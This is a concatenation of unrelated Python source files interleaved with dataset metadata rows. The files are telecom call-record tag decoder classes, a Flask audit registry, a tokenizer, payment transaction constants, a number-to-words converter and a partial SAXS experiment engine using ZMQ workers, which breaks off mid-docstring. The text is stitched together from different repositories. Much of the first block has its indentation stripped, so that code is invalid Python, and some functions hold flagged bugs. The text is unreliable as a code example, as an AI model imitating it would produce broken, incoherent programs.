class NetworkCallReference(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "networkCallReference"
super(NetworkCallReference, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class NumberOfChannels(Tag):
    # NOTE(review): unlike most sibling tags this class sets no default name
    # and no decode_value -- presumably callers always supply a context
    # name; confirm against the Tag base class before adding a default.
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(NumberOfChannels, self).__init__(header, byte_string, load_value, name)
class NumberOfMeterPulses(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "numberOfMeterPulses"
super(NumberOfMeterPulses, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class NumberOfOperations(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "numberOfOperations"
super(NumberOfOperations, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class NumberOfShortMessage(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "numberOfShortMessages"
super(NumberOfShortMessage, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class OperationIdentifier(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(OperationIdentifier, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class OptimalRoutingType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "optimalRoutingType"
super(OptimalRoutingType, self).__init__(header, byte_string, load_value, name)
class OriginatedCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "originatedCode"
super(OriginatedCode, self).__init__(header, byte_string, load_value, name)
class OriginatingLineInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "originatingLineInformation"
super(OriginatingLineInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class OutputForSubscriber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "outputForSubscriber"
super(OutputForSubscriber, self).__init__(header, byte_string, load_value, name)
class OutputType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "outputType"
super(OutputType, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class PartialOutputRecNum(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "partialOutputRecNum"
super(PartialOutputRecNum, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PChargingVector(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(PChargingVector, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PositioningDelivery(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "positioningDelivery"
super(PositioningDelivery, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PointCodeAndSubSystemNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(PointCodeAndSubSystemNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PositionAccuracy(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "positionAccuracy"
super(PositionAccuracy, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PresentationAndScreeningIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "presentationAndScreeningIndicator"
super(PresentationAndScreeningIndicator, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ProcedureCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ProcedureCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class RadioChannelProperty(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "radioChannelProperty"
super(RadioChannelProperty, self).__init__(header, byte_string, load_value, name)
class RANAPCauseCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rANAPCauseCode"
super(RANAPCauseCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class RecordSequenceNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "recordSequenceNumber"
super(RecordSequenceNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class RedirectionCounter(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "redirectionCounter"
super(RedirectionCounter, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class RegionalServiceUsed(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "regionalServiceUsed"
super(RegionalServiceUsed, self).__init__(header, byte_string, load_value, name)
class ResponseTimeCategory(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "responseTimeCategory"
super(ResponseTimeCategory, self).__init__(header, byte_string, load_value, name)
class RoamingPriorityLevel(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "roamingPriorityLevel"
super(RoamingPriorityLevel, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class Route(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Route, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_ascii(byte_string)
class RTCDefaultServiceHandling(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCDefaultServiceHandling"
super(RTCDefaultServiceHandling, self).__init__(header, byte_string, load_value, name)
class RTCFailureIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCFailureIndicator"
super(RTCFailureIndicator, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class RTCNotInvokedReason(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCNotInvokedReason"
super(RTCNotInvokedReason, self).__init__(header, byte_string, load_value, name)
class RTCSessionID(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCSessionID"
super(RTCSessionID, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SelectedCodec(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "selectedCodec"
super(SelectedCodec, self).__init__(header, byte_string, load_value, name)
class ServiceCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ServiceCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class ServiceFeatureCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "serviceFeatureCode"
super(ServiceFeatureCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ServiceKey(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ServiceKey, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ServiceSwitchingType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "serviceSwitchingType"
super(ServiceSwitchingType, self).__init__(header, byte_string, load_value, name)
class Single(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Single, self).__init__(header, byte_string, load_value, name)
class SMSResult(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sMSResult"
super(SMSResult, self).__init__(header, byte_string, load_value, name)
class SpeechCoderPreferenceList(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(SpeechCoderPreferenceList, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SpeechCoderVersion(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(SpeechCoderVersion, self).__init__(header, byte_string, load_value, name)
class SSCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sSCode"
super(SSCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SSFChargingCase(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sSFChargingCase"
super(SSFChargingCase, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SSRequest(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sSRequest"
super(SSRequest, self).__init__(header, byte_string, load_value, name)
class SubscriberState(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "subscriberState"
super(SubscriberState, self).__init__(header, byte_string, load_value, name)
class SubscriptionType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "subscriptionType"
super(SubscriptionType, self).__init__(header, byte_string, load_value, name)
class SwitchIdentity(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "switchIdentity"
super(SwitchIdentity, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class TAC(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "tAC"
super(TAC, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class TargetRNCid(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TargetRNCid, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TariffClass(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "tariffClass"
super(TariffClass, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class TariffSwitchInd(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "tariffSwitchInd"
super(TariffSwitchInd, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class TeleServiceCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "teleServiceCode"
super(TeleServiceCode, self).__init__(header, byte_string, load_value, name)
class Time(Tag):
    # Generic time tag: no default name -- callers supply context-specific
    # names (unlike most sibling Tag subclasses which default their name).
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(Time, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # NOTE(review): the second argument (2) presumably selects a variant
        # of get_octet_string's formatting -- confirm against its definition.
        return get_octet_string(byte_string, 2)
class TrafficActivityCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "trafficActivityCode"
super(TrafficActivityCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TransferDelay(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "transferDelay"
super(TransferDelay, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TransitCarrierInfo(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TransitCarrierInfo, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TransparencyIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "transparencyIndicator"
super(TransparencyIndicator, self).__init__(header, byte_string, load_value, name)
class TriggerData(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TriggerData, self).__init__(header, byte_string, load_value, name)
class TriggerDetectionPoint(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TriggerDetectionPoint, self).__init__(header, byte_string, load_value, name)
class TypeOfCalledSubscriber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfCalledSubscriber"
super(TypeOfCalledSubscriber, self).__init__(header, byte_string, load_value, name)
class TypeOfCallingSubscriber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfCallingSubscriber"
super(TypeOfCallingSubscriber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TypeOfLocationRequest(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfLocationRequest"
super(TypeOfLocationRequest, self).__init__(header, byte_string, load_value, name)
class TypeOfSignalling(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfSignalling"
super(TypeOfSignalling, self).__init__(header, byte_string, load_value, name)
class UILayer1Protocol(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(UILayer1Protocol, self).__init__(header, byte_string, load_value, name)
class UnsuccessfulPositioningDataReason(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "unsuccessfulPositioningDataReason"
super(UnsuccessfulPositioningDataReason, self).__init__(header, byte_string, load_value, name)
class UserClass(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "userClass"
super(UserClass, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class UserRate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(UserRate, self).__init__(header, byte_string, load_value, name)
class UserTerminalPosition(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "userTerminalPosition"
super(UserTerminalPosition, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class UserToUserInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "userToUserInformation"
super(UserToUserInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class UserToUserService1Information(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(UserToUserService1Information, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
######
# Event Modules Data Tags
|
UTF-8
|
Python
| false | false | 2,014 |
16,372,415,365,444 |
20bb340371b82f47d56cd3260c8a3992326dfd39
|
41c273492a34216f94a3118b43293f277f80ba76
|
/splendor/audit.py
|
7f2ec383eeef0a8892aaac781f749792218ec965
|
[] |
no_license
|
DeadWisdom/splendor
|
https://github.com/DeadWisdom/splendor
|
b59b3c510a13958b6d29e67f07a9b48505e3bd5c
|
541fb31f24795f42e32de036b35108d76ba63c4f
|
refs/heads/master
| 2021-01-23T02:24:05.421525 | 2014-10-06T19:26:13 | 2014-10-06T19:26:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__audits = {}  # registry: audit name -> predicate function


def register_audit(name, fn):
    """Register *fn* as the audit called *name* (silently overwrites)."""
    __audits[name] = fn


def get_audit(name):
    """Return the audit function registered as *name*.

    Raises:
        KeyError: if no audit was registered under *name*.
    """
    return __audits[name]


def perform_audit(name, resource):
    """Run the audit called *name* against *resource*.

    A leading '!' negates the verdict: perform_audit('!x', r) is the
    boolean inverse of what the 'x' audit returns for r.
    """
    if name.startswith('!'):
        return not get_audit(name[1:])(resource)
    return get_audit(name)(resource)


def audit(name=None):
    """Decorator registering a function as a named audit.

    Supports both bare use (@audit -- registered under the function's own
    name) and parameterised use (@audit('some_name')).

    Bug fix: the original relied on the Python-2-only ``basestring`` and
    ``fn.func_name``; ``callable`` and ``__name__`` behave identically on
    Python 2 and also work on Python 3.
    """
    if callable(name):
        # Bare @audit usage: *name* is actually the decorated function.
        fn = name
        register_audit(fn.__name__, fn)
        return fn

    def outer(fn):
        register_audit(name, fn)
        return fn
    return outer
### Stock Audits ###
from flask import current_app
@audit
def is_debug(resource):
    # Registered under its own function name ('is_debug', negatable as
    # '!is_debug'); *resource* is ignored -- the verdict reflects only the
    # active Flask application's debug flag.
    return current_app.debug
|
UTF-8
|
Python
| false | false | 2,014 |
2,199,023,259,663 |
b0ef728309ee6ed6a744a356264870edf0a703b7
|
5f5ed1046573ed89d789f3000f87ff6113c8a340
|
/TokenizerClass.py
|
2df9a314b22e1497452ecc3f704d2aac18d10934
|
[] |
no_license
|
samueltenka/FuncRegex
|
https://github.com/samueltenka/FuncRegex
|
9e685839c5bae828238640d326616bb6700c5976
|
14f76774cb5f9a68701756843f1f8243b6a2860f
|
refs/heads/master
| 2016-09-02T10:59:01.677114 | 2013-11-01T03:23:22 | 2013-11-01T03:23:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on Jun 27, 2011
@author: Sam
'''
from TokenClass import Token
import TextSkipperClass
class Tokenizer(TextSkipperClass.TextSkipper):
    """Split text into Token objects: identifiers, numbers and symbols.

    NOTE(review): the character sets (alphabet, digits, numberSyms, syms,
    alphaNumeric, decimalPoint) and the cursor API (currentChar, forward,
    atEnd) are inherited from TextSkipper, which is not visible here --
    their exact contents are assumed, not verified.
    """
    # Class-level defaults shared by all instances.
    # NOTE(review): __init__ assigns self.myText, never self.text -- confirm
    # which attribute TextSkipper's cursor methods actually read.
    text = ""
    tokensList = []
    def __init__(self, text):
        self.myText = text
        self.tokenize()
    def tokenize(self):
        # Walk the whole text, classifying each token by its first character.
        self.tokensList = []
        while not self.atEnd():
            currentChar = self.currentChar()
            if currentChar in self.alphabet:
                self.tokensList += [Token(self.getIdentifier())]
            elif currentChar in self.numberSyms:
                self.tokensList += [Token(self.getNumber())]
            else:
                self.tokensList += [Token(self.getSym())]
    def __getStringOfACharType__(self, listOfAllowableChars):
        """Consume and return the run of characters drawn from *listOfAllowableChars*."""
        text = ""
        while self.currentChar() in listOfAllowableChars:
            text += self.currentChar()
            self.forward()
        return text
    def getNumber(self):
        """These representations are all OK: "729.", "729.0", "08.80", ".8080" """
        # Returns None (implicitly) when the cursor is not on a number start.
        if self.currentChar() in self.numberSyms:
            text = ""
            text += self.__getStringOfACharType__(self.digits) ## get pre-decimal-point digits
            if self.currentChar() == self.decimalPoint: ## get possible decimal point . . .
                text += '.'
                text += self.__getStringOfACharType__(self.digits) ## . . . and get digits after decimal point
            return text
    def getIdentifier(self):
        """ "Abc", "sls_34567vs__", "a234567", and "a______a_" are OK, but "_Abc", "4ndo", and "268" are not. """
        # Returns None (implicitly) when the cursor is not on a letter.
        if self.currentChar() in self.alphabet:
            return self.__getStringOfACharType__(self.alphaNumeric)
    def getSym(self):
        """ gets the longest symbol it can, given the starting position """
        # NOTE(review): charToPossiblyAppend is never refreshed inside the
        # loop, so multi-character symbols only match when they repeat the
        # first character (e.g. "==" works, "+=" cannot) -- looks like a bug.
        text = ""
        charToPossiblyAppend = self.currentChar()
        while text + charToPossiblyAppend in self.syms:
            text += charToPossiblyAppend
            self.forward()
        return text
|
UTF-8
|
Python
| false | false | 2,013 |
7,181,185,341,847 |
b8b30af528094f436b8dd3e6659ba99e50bed69a
|
813d893e618ee015834257fcb455919a9d5fba7c
|
/apps/carddirector/cd_main/constants/transaction_type_names.py
|
62ea2f6aa1694e57c68d7f37d9350c6cb28f73c6
|
[] |
no_license
|
devshark/CardManager
|
https://github.com/devshark/CardManager
|
9b30be52886b07df21fcbe74f193c39102f41e72
|
4cc6df3718fb81c61bd9aeefa580fb57b802fbbd
|
refs/heads/master
| 2018-03-10T15:31:00.065973 | 2013-08-13T08:43:59 | 2013-08-13T08:43:59 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'matthewlai'
# Transaction-type name constants for the Card Director app.
# NOTE(review): the values are presumably stored/matched in transaction
# records -- treat them as stable identifiers, not display text.
CD_CARD_LOAD = 'CD CARD LOAD'
CD_CARD_UNLOAD = 'CD CARD UNLOAD'
CD_CARD_APPLICATION_APPROVE_RINGFENCED = 'CD CARD APPLICATION APPROVE RINGFENCED'
CD_CARD_APPLICATION_ACTIVATED_RINGFENCED = 'CD CARD APPLICATION ACTIVATED RINGFENCED'
CD_CARD_APPLICATION_CANCEL_RINGFENCED = 'CD CARD APPLICATION CANCEL RINGFENCED'
CD_CARD_MANUAL_RETURN_RINGFENCED = 'CD CARD MANUAL RETURN RINGFENCED'
CD_CARD_ACTIVATION_FEE = 'CD CARD ACTIVATION FEE'
CD_CARD_PRELOAD_ON_ACTIVATION = 'CD CARD PRELOAD ON ACTIVATION'
CD_CARD_MONTHLY_FEE = 'CD CARD MONTHLY FEE'
CD_ACQUIRING_PURCHASE = 'CD ACQUIRING PURCHASE'
CD_ACQUIRING_REFUND = 'CD ACQUIRING REFUND'
|
UTF-8
|
Python
| false | false | 2,013 |
1,039,382,093,569 |
b1bab28a330bf725f67b8c5b9b30d637a5b1e36f
|
515cadb28ff16ea79219c00235340cc023b6275f
|
/tcc/convert_function.py
|
0058a11fb871521125d69263096ab4bd91931fa4
|
[] |
no_license
|
Muskana/ofau
|
https://github.com/Muskana/ofau
|
edcd252bfac91f43debb3371d3c58d5b87872c99
|
4e9929b1c1e5b85256e4131c6dbbf8a29ea79181
|
refs/heads/master
| 2021-01-21T01:34:02.502711 | 2014-07-06T06:37:20 | 2014-07-06T06:37:20 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def num2eng(n):
    """Convert a non-negative integer to English words (Indian system).

    Grouping follows the Indian numbering system: Hundred, Thousand,
    Lakh (1e5) and Crore (1e7), e.g. num2eng(100000) == 'One Lakh'.

    Args:
        n: non-negative integer to spell out.

    Returns:
        The words as a single-spaced string; '' for 0.
    """
    words = ''
    units = ['', 'One', 'Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine', 'Ten', 'Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen']
    tens = ['', 'Ten', 'Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety']
    for group in ['', 'Hundred', 'Thousand', 'Lakh', 'Crore']:
        # Peel off the digits belonging to this group: two digits for the
        # plain/Thousand/Lakh groups, one for Hundred, the remainder for Crore.
        if group in ['', 'Thousand', 'Lakh']:
            n, digits = n // 100, n % 100
        elif group == 'Hundred':
            n, digits = n // 10, n % 10
        else:
            digits = n
        if 1 <= digits < 20:
            words = units[digits] + ' ' + group + ' ' + words
        elif 20 <= digits < 100:
            ten_digit, unit_digit = digits // 10, digits % 10
            words = tens[ten_digit] + ' ' + units[unit_digit] + ' ' + group + ' ' + words
        elif digits >= 100:
            # 100 crore or more: recurse on the crore count.
            # Bug fix: was lowercase ' crore ', inconsistent with the
            # capitalised group names used everywhere else.
            words = num2eng(digits) + ' Crore ' + words
    # Bug fix: collapse the stray spaces the concatenations above leave
    # behind (the original returned e.g. 'Five  ' with trailing blanks).
    return ' '.join(words.split())
|
UTF-8
|
Python
| false | false | 2,014 |
4,269,197,539,810 |
24c4bc397dc8478fc6c761d703ed7979d088a6c0
|
cc5086e1dcfb043ae5fa84da8f6a8a397d66d249
|
/Engine.py
|
1d137e1c8c58e6cbf5355bcee9c85ed7bf78646e
|
[] |
no_license
|
imewei/SAXS-Auto-Processor-1
|
https://github.com/imewei/SAXS-Auto-Processor-1
|
e3b9e4ce8d15fe23bd9916fc2edaf251216d2b44
|
5e33aadda1ca0be7acbcd72722a7c5966f7c63c1
|
refs/heads/master
| 2020-02-04T10:16:12.506031 | 2012-06-21T00:26:51 | 2012-06-21T00:26:51 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
###BASH start stop
#screen -dmS "engine" "./engine.py"
import logging
import sys
import time
import epics
import os
import zmq
import yaml
from threading import Thread
from Core.EngineFunctions import getString as getString
from Core.EngineFunctions import testStringChange as testStringChange
from Core.EngineFunctions import createFolderStructure as createFolderStructure
from Core.RootName import changeInRootName
from Core import LogWatcher
from Core import LogLine
from Core import DatFile
class Engine():
"""
.. codeauthor:: Jack Dwyer <[email protected]>
Is the goto man for controlling the sequence of events that will occur after a datFile has been created
"""
    def __init__(self, configuration):
        """Set up logging, load configuration, and spin up + connect workers.

        Order matters here: logging first, then config (which supplies the
        worker list), then worker instantiation and ZMQ wiring.

        Args:
            configuration: path to the YAML config file (see setConfiguration).
        """
        self.name = "Engine"
        self.logger = None
        # setLoggingDetails() is defined outside this view; presumably it
        # populates self.logger before anything below logs.
        self.setLoggingDetails()
        #Instantiate class variables
        self.first = True #For catching index error
        self.rootDirectory = None
        self.user = None
        self.logLines = []
        self.needBuffer = True
        # Object that will be watching the LiveLogFile
        self.logWatcher = LogWatcher.LogWatcher()
        # Set correctly in newUser()
        self.liveLog = None
        self.datFileLocation = None
        self.previousUser = None #Used to compare current user against new user (to stop if users click the pv etc)
        self.previousExperiment = None
        self.workers = None
        #Read all configuration settings
        self.setConfiguration(configuration)
        #ZMQ Class Variables
        self.zmqContext = zmq.Context()
        self.requestBuffer = None
        #Instantiate all workers, get them all ready to push out into their own thread and connected up
        self.instanceWorkerDict = self.instantiateWorkers(self.workers)
        #Connect up workers
        self.connectWorkers(self.instanceWorkerDict)
def setConfiguration(self, configuration):
"""Reads the default configuration file that is passed at object creation
The configuration stores the Workers that need to be loaded, whether an Experiment name is being used
The Absolute location of the datFiles.
Any PV's that need to be watched
Args:
Configuration (file): A YAML config file
Returns:
Nothing
Sets class Variables:
| self.rootDirectory = The absolute location of the experiments as mounted on the local machine.
| self.userChangePV = The FullPath PV from epics to watch for user/experiment change over.
| self.experimentFolderOn = Switch if they experiment folders are being used.
| self.workrs = List of all workers that need to be instantiated.
Raises:
IOError: When it is unable to find the configuration
"""
try:
stream = file(configuration, 'r')
except IOError:
logging.critical(self.name, "Unable to find configuration file (config.yaml, in current directory), exiting.")
sys.exit
config = yaml.load(stream)
self.rootDirectory = config.get('RootDirectory')
self.userChangePV = config.get('UserChangePV')
self.experimentFolderOn = config.get('ExperimentFolderOn')
print self.experimentFolderOn
self.workers = config.get('workers')
def instantiateWorkers(self, workers):
"""Instantiates each worker as specified by the Configuration
Args:
Workers: A list of string names of each worker
Returns:
instanceDict: A dictionary of Key (Worker Name String): Value (Instantiated Worker Object)
"""
self.logger.info("Instantiating all workers")
instanceDict = {}
for worker in workers:
im = __import__('Workers.'+worker, globals(), locals(), [worker])
v = getattr(im, worker)
x = v()
instanceDict[worker] = x
return instanceDict
    def connectWorkers(self, instanceDict):
        """
        Connects all Workers to required ZMQ sockets
        Loads each worker into a Daemon Thread
        Uses Push for all workers
        PUB/SUB for WorkerDB
        REQ/REP for WorkerBufferAverage
        Args:
            instanceDict (dictionary): Dictionary created from instantiateWorkers
        Returns:
            Nothing
        Sets Class Variables:
            | self.connectedWorkers = Dictionary - key, Worker(string): push port(string)
        """
        # Port allocation: each worker gets its own PUSH port starting at
        # 2000; all workers share the PUB port; the buffer-average worker
        # additionally gets a dedicated REQ/REP port.
        pushPort = 2000
        pubPort = 1998
        bufferRequestPort = 1999
        #Actual Worker Threads
        workerThreads = {}
        #Which worker, and which port are they on
        workerPortLocation = {}
        self.connectedWorkers = {}
        #Start up a dictionary of threads, so we know where all the workers are
        for worker in instanceDict:
            if (worker == "WorkerBufferAverage"):
                # Special case: this worker also serves buffer requests over
                # REQ/REP, so the engine keeps a REQ socket to it.
                workerThreads[worker] = Thread(target=instanceDict[worker].connect, args=(pushPort, pubPort, bufferRequestPort))
                workerPortLocation[worker] = pushPort
                self.requestBuffer = self.zmqContext.socket(zmq.REQ)
                self.requestBuffer.connect("tcp://127.0.0.1:"+str(bufferRequestPort))
                pushPort = pushPort + 1
            else:
                workerThreads[worker] = Thread(target=instanceDict[worker].connect, args=(pushPort, pubPort,))
                workerPortLocation[worker] = pushPort #So we know where to send commands
                pushPort = pushPort + 1
        #Set all workers as Daemon threads (so they all die when we close the application)
        for workerThread in workerThreads:
            workerThreads[workerThread].setDaemon(True)
        #Start all the threads
        for workerThread in workerThreads:
            workerThreads[workerThread].start()
            time.sleep(0.1) #short pause to let them properly bind/connect their ports
        #Set up ZMQ context for each worker
        for worker in workerPortLocation:
            # NOTE(review): the next statement is a no-op expression (the
            # value is looked up and discarded) -- left as-is deliberately.
            workerPortLocation[worker]
            self.connectedWorkers[worker] = self.zmqContext.socket(zmq.PUSH)
        #connect workers to the engine
        for worker in self.connectedWorkers:
            self.connectedWorkers[worker].connect("tcp://127.0.0.1:"+str(workerPortLocation[worker]))
        self.logger.info("All Workers connected and ready")
# Event Watching
    def setUserWatcher(self):
        """
        Sets up a epics.camonitor against the PV set by the configuration file
        Callback:
            setUser()
        """
        # self.userChangePV is populated by setConfiguration(); camonitor
        # invokes setUser() with the PV's new value on every change.
        epics.camonitor(self.userChangePV, callback=self.setUser)
def watchForLogLines(self, logLocation):
"""
Creates an object for watching the logfile that callsback when ever a new line has been written
Callback:
lineCreated()
"""
self.logWatcher.setLocation(logLocation)
self.logWatcher.setCallback(self.lineCreated)
self.logWatcher.watch()
    def killLogWatcher(self):
        """
        Kills Log Watcher Object
        """
        # Stops the watcher started by watchForLogLines().
        self.logWatcher.kill()
    def setUser(self, char_value, **kw):
        """
        | Sets the User for the Engine, and all workers.
        | Is called when the PV changes
        | Checks new user value against previous user
        | If matching values, nothing occurs
        | Calls newUser(user) if it is a new user
        Args:
